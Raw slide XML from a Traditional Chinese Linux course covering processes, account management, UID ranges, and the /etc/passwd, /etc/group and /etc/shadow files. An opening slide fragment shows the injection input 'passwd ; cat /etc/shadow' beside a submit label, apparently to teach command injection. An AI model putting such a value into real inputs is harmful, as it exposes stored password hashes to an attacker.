              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/shadow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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="圓角矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7715520" y="3880116"/>
            <a:ext cx="864096" cy="2358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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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38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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程序、進程 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舉例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多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>工</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Multitasking Operating System)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中，可以同時執行數個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，然而一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>一次只能執行一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>因此才有現在的多核處理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，而 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的運行量總量不會少於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的總量，又</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>會佔用記憶體，因此如何排程、如何有效管理記憶體則是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所關注的事。	</a:t>
            </a:r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07200" y="1578600"/>
              <a:ext cx="1393560" cy="75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1360" y="1515240"/>
                <a:ext cx="142524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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4064760" y="1557360"/>
              <a:ext cx="793440" cy="144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48920" y="1493640"/>
                <a:ext cx="82512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2778840" y="1607400"/>
              <a:ext cx="60048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763000" y="1543680"/>
                <a:ext cx="6321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800360" y="2593080"/>
              <a:ext cx="1643400" cy="147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784520" y="2529720"/>
                <a:ext cx="167508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450160" y="2957400"/>
              <a:ext cx="2650680" cy="28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434320" y="2894040"/>
                <a:ext cx="268272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672240" y="4071960"/>
              <a:ext cx="443160" cy="7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656400" y="4008240"/>
                <a:ext cx="4748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635840" y="4421880"/>
              <a:ext cx="177192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620000" y="4358520"/>
                <a:ext cx="18039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172040" y="4357440"/>
              <a:ext cx="393120" cy="291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156200" y="4294080"/>
                <a:ext cx="424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4943520" y="4486320"/>
              <a:ext cx="137196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927680" y="4422600"/>
                <a:ext cx="14036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6681600" y="5257800"/>
              <a:ext cx="36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665760" y="5194440"/>
                <a:ext cx="320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2632320" y="2991240"/>
              <a:ext cx="2305800" cy="266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616480" y="2927880"/>
                <a:ext cx="23374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2622600" y="2984400"/>
              <a:ext cx="2553120" cy="1972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606760" y="2921040"/>
                <a:ext cx="2584800" cy="32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6438960" y="3676680"/>
              <a:ext cx="520920" cy="255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423120" y="3613320"/>
                <a:ext cx="5526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6692760" y="4051440"/>
              <a:ext cx="254520" cy="648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676920" y="3987720"/>
                <a:ext cx="286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1854360" y="4444920"/>
              <a:ext cx="1638360" cy="320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838160" y="4381560"/>
                <a:ext cx="1670400" cy="15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634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zh-TW" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>九、帳號管理、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>ACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>設定與排程設定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965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每個帳號均有自己的家目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>與及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>其他帳號相關的操作環境之設定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>三</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>種身份：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>owner(user)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>others</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案權限相關性很</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>高</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>設定檔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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/group  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>存放所有群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>存放所有使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>/shadow(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>存放所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>設定密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="30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帳號管理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2984400" y="2717640"/>
              <a:ext cx="2019600" cy="450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68560" y="2654280"/>
                <a:ext cx="205164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425840" y="2781360"/>
              <a:ext cx="240696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10000" y="2717640"/>
                <a:ext cx="24390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6870600" y="2743200"/>
              <a:ext cx="175932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854760" y="2679840"/>
                <a:ext cx="17910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238400" y="4559400"/>
              <a:ext cx="1314720" cy="702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22200" y="4495680"/>
                <a:ext cx="134676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289160" y="5156280"/>
              <a:ext cx="159408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73320" y="5092560"/>
                <a:ext cx="16257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22440" y="5676840"/>
              <a:ext cx="1899000" cy="450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6600" y="5613480"/>
                <a:ext cx="19306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524400" y="4476600"/>
              <a:ext cx="1778040" cy="640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08200" y="4413240"/>
                <a:ext cx="18104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622760" y="5137200"/>
              <a:ext cx="1295640" cy="129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606920" y="5073480"/>
                <a:ext cx="13276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148064" y="5642048"/>
              <a:ext cx="2448272" cy="45719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132225" y="5578187"/>
                <a:ext cx="2479951" cy="17380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1600" y="3364560"/>
              <a:ext cx="1128960" cy="18864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400" y="3301200"/>
                <a:ext cx="1161000" cy="201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693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000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>/group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>關聯圖</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="30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帳號管理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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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7" y="2132856"/>
            <a:ext cx="7741353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15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/>
              <a:t>UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：用戶獨一無二的身份標識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帳號與群組</a:t>
            </a:r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6279673"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611560" y="2420889"/>
          <a:ext cx="7772400" cy="3168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3670">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
                        <a:t>用戶名</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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dirty="0" smtClean="0"/>
                        <a:t>UID</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
                        <a:t>超級用戶</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
                        <a:t>系統標準用戶</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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dirty="0" smtClean="0"/>
                        <a:t>1~999</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
                        <a:t>普通用戶</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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dirty="0" smtClean="0"/>
                        <a:t>1000~65535</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
                        <a:t>外部應用程序用戶</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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000" dirty="0" smtClean="0"/>
                        <a:t>65535</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
                        <a:t>以後</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" alt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882720" y="1638360"/>
              <a:ext cx="972000" cy="11242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6880" y="1574640"/>
                <a:ext cx="1003680" cy="125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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="857160" y="1422360"/>
              <a:ext cx="692640" cy="114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41320" y="1359000"/>
                <a:ext cx="72432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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="596880" y="3384720"/>
              <a:ext cx="1308600" cy="38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81040" y="3321000"/>
                <a:ext cx="134028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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4610160" y="3301920"/>
              <a:ext cx="476640" cy="194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594320" y="3238560"/>
                <a:ext cx="508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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="774720" y="3981600"/>
              <a:ext cx="520920" cy="25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58880" y="3917880"/>
                <a:ext cx="5526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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2178000" y="4013280"/>
              <a:ext cx="464040" cy="255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62160" y="3949560"/>
                <a:ext cx="4957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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4572000" y="3930480"/>
              <a:ext cx="1130760" cy="194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556160" y="3867120"/>
                <a:ext cx="11624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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="507960" y="4635360"/>
              <a:ext cx="1822680" cy="576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92120" y="4572000"/>
                <a:ext cx="18547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筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4629240" y="4591080"/>
              <a:ext cx="1797480" cy="8928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613400" y="4527720"/>
                <a:ext cx="182916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筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="812880" y="5257800"/>
              <a:ext cx="476640" cy="129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97040" y="5194440"/>
                <a:ext cx="5083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筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2197080" y="5308560"/>
              <a:ext cx="1441800" cy="1148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181240" y="5245200"/>
                <a:ext cx="147348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筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4699080" y="5270400"/>
              <a:ext cx="1416240" cy="7020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683240" y="5207040"/>
                <a:ext cx="1447920" cy="197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135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sz="3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GB" altLang="zh-CN" sz="3400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：用戶群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-GB" sz="3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用戶群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-GB" sz="4400" dirty="0"/>
              <a:t>管理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4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" t="4632" r="43289" b="82719"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1187624" y="1823550"/>
            <a:ext cx="6681429" cy="2193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直線圖說文字 2 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="4595997"/>
            <a:ext cx="1872208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81876"/>
              <a:gd name="adj6" fmla="val 6947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群組名稱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1474716" y="5436327"/>
            <a:ext cx="210030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200413"/>
              <a:gd name="adj6" fmla="val 311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群組密碼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>
          <a:xfrm>
            <a:off x="3905812" y="4595997"/>
            <a:ext cx="1458276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78415"/>
              <a:gd name="adj6" fmla="val -957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</a:rPr>
              <a:t>GID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" name="直線圖說文字 2 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4360420" y="5436327"/>
            <a:ext cx="2919126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192273"/>
              <a:gd name="adj6" fmla="val 376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所屬帳號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590400" y="0"/>
              <a:ext cx="965880" cy="14162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4560" y="-63360"/>
                <a:ext cx="997560" cy="154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495360" y="4921200"/>
              <a:ext cx="109872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79520" y="4857840"/>
                <a:ext cx="1130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" name="筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1797120" y="5797440"/>
              <a:ext cx="118764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81280" y="5734080"/>
                <a:ext cx="1219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" name="筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4178160" y="4863960"/>
              <a:ext cx="648360" cy="259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162320" y="4800600"/>
                <a:ext cx="6800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3" name="筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5060880" y="5797440"/>
              <a:ext cx="118152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045040" y="5734080"/>
                <a:ext cx="12132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" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2850480" y="2700360"/>
              <a:ext cx="2271960" cy="75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834640" y="2636640"/>
                <a:ext cx="23036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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1257120" y="2707560"/>
              <a:ext cx="564840" cy="432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241280" y="2643840"/>
                <a:ext cx="59652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6" name="筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2986200" y="2714400"/>
              <a:ext cx="2364840" cy="3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970360" y="2651040"/>
                <a:ext cx="23965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7" name="筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="750240" y="2979000"/>
              <a:ext cx="1707480" cy="1573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34040" y="2915280"/>
                <a:ext cx="1739520" cy="28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8" name="筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3143160" y="3135960"/>
              <a:ext cx="3329280" cy="147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127320" y="3072600"/>
                <a:ext cx="336132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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1135800" y="3500280"/>
              <a:ext cx="700560" cy="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119960" y="3436920"/>
                <a:ext cx="732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0" name="筆跡 19"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2928960" y="3479040"/>
              <a:ext cx="2565000" cy="3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913120" y="3415320"/>
                <a:ext cx="259668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939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sz="3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GB" altLang="zh-CN" sz="3400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="3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GB" altLang="zh-CN" sz="3400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3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GB" sz="34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TW" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>訊息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3400" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>檔案</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-GB" sz="3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用戶帳號管理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4" t="81305" r="34010" b="5568"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="474147" y="1844824"/>
            <a:ext cx="8346325" cy="2419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直線圖說文字 2 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189765" y="4792964"/>
            <a:ext cx="100811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72645"/>
              <a:gd name="adj6" fmla="val 633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帳號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1008898" y="5633294"/>
            <a:ext cx="100811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190925"/>
              <a:gd name="adj6" fmla="val 386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密碼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>
          <a:xfrm>
            <a:off x="1691680" y="4792964"/>
            <a:ext cx="100811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73799"/>
              <a:gd name="adj6" fmla="val 393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</a:rPr>
              <a:t>UID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3" name="直線圖說文字 2 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2449058" y="5633294"/>
            <a:ext cx="100811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192272"/>
              <a:gd name="adj6" fmla="val 386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</a:rPr>
              <a:t>GID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4" name="直線圖說文字 2 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275856" y="4792964"/>
            <a:ext cx="100811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73799"/>
              <a:gd name="adj6" fmla="val 775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說明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5" name="直線圖說文字 2 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3980114" y="5647366"/>
            <a:ext cx="1672006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192272"/>
              <a:gd name="adj6" fmla="val 467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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>家目錄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6" name="直線圖說文字 2 15"/>
